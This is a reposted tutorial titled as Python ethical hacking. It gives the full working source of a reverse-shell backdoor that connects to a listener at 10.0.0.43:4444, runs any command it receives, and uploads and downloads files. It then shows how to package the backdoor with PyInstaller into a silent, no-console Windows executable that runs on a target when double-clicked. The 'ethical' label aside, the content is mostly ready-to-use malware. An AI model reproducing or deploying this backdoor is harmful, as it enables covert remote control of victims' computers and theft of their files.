加入收藏 | 设为首页 | 会员中心 | 我要投稿 李大同 (https://www.lidatong.com.cn/)- 科技、建站、经验、云计算、5G、大数据,站长网!
当前位置: 首页 > 编程开发 > Python > 正文

Python Ethical Hacking - Malware Packaging(1)

发布时间:2020-12-20 10:22:50 所属栏目:Python 来源:网络整理
导读:PACKAGING Convert python program into an executable that: Packages all program files into a single executable. Works without a python interpreter. Get executed when double-clicked. For best results package the program from the same OS as t

PACKAGING

  • Convert python program into an executable that:
    • Packages all program files into a single executable.
    • Works without a python interpreter.
    • Get executed when double-clicked.
  • For best results package the program from the same OS as the target.
    • EG if the target is Windows then package the program from a Windows computer with a python interpreter.

?

Install PyInstaller firstly.

Refer to :?https://pyinstaller.readthedocs.io/en/latest/installation.html

Polish the backdoor code to fit the silent executable.

#!/usr/bin/env python
import json
import socket
import subprocess
import os
import base64
import sys


class Backdoor:
    def __init__(self,ip,port):
        self.connection = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
        self.connection.connect((ip,port))

    def reliable_send(self,data):
        json_data = json.dumps(data).encode()
        self.connection.send(json_data)

    def reliable_receive(self):
        json_data = ""
        while True:
            try:
                json_data = json_data + self.connection.recv(1024).decode()
                return json.loads(json_data)
            except ValueError:
                continue

    def change_working_directory_to(self,path):
        os.chdir(path)
        return "[+] Changing working directory to " + path

    def execute_system_command(self,command):
        DEVNULL = open(os.devnull,"wb")
        return subprocess.check_output(command,shell=True,stderr=DEVNULL,stdin=DEVNULL)

    def read_file(self,path):
        with open(path,"rb") as file:
            return base64.b64encode(file.read())

    def write_file(self,path,content):
        with open(path,"wb") as file:
            file.write(base64.b64decode(content))
            return "[+] Upload successful."

    def run(self):
        while True:
            command = self.reliable_receive()

            try:
                if command[0] == "exit":
                    self.connection.close()
                    sys.exit()
                elif command[0] == "cd" and len(command) > 1:
                    command_result = self.change_working_directory_to(command[1])
                elif command[0] == "upload":
                    command_result = self.write_file(command[1],command[2])
                elif command[0] == "download":
                    command_result = self.read_file(command[1]).decode()
                else:
                    command_result = self.execute_system_command(command).decode()
            except Exception:
                command_result = "[-] Error during command execution."

            self.reliable_send(command_result)


my_backdoor = Backdoor("10.0.0.43",4444)
my_backdoor.run()

Convert the python program to an executable program.

C:Python37Scriptspyinstaller.exe reverse_backdoor.py --onefile --noconsole

?

?Find and double-click the reverse-backdoor.exe program in the dist folder.

?

?

The executable program runs perfectly.

(编辑:李大同)

【声明】本站内容均来自网络,其相关言论仅代表作者个人观点,不代表本站立场。若无意侵犯到您的权利,请及时与联系站长删除相关内容!

    推荐文章
      热点阅读